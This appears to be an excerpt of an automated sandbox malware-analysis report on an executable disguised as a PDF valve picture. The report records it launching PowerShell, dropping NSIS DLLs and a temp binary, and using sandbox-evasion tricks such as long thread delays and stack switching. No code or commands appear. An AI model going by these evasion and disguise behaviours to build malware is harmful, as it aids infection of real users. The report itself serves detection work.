Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

API/Special instruction interceptor: Address: 286703E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7808	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1885	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Window / User API: threadDelayed 4261	Jump to behavior

Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nst5070.tmp\nsExec.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nst5070.tmp\nsDialogs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nst5070.tmp\BgImage.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6716	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe TID: 5516	Thread sleep count: 4261 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe TID: 5220	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe TID: 5220	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Thread sleep count: Count: 4261 delay: -5

Jump to behavior

Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Code function: 0_2_00405FFD FindFirstFileA,FindClose,	0_2_00405FFD
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Code function: 0_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_0040559B
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Code function: 0_2_00402688 FindFirstFileA,	0_2_00402688

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts	Jump to behavior
Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: Slringsnettets.exe, 00000006.00000002.2902321188.00000000032DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Slringsnettets.exe, 00000006.00000002.2902321188.00000000032DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWg
Source: Slringsnettets.exe, 00000006.00000002.2902321188.0000000003288000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWxC.

Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	API call chain: ExitProcess graph end node			graph_0-3610
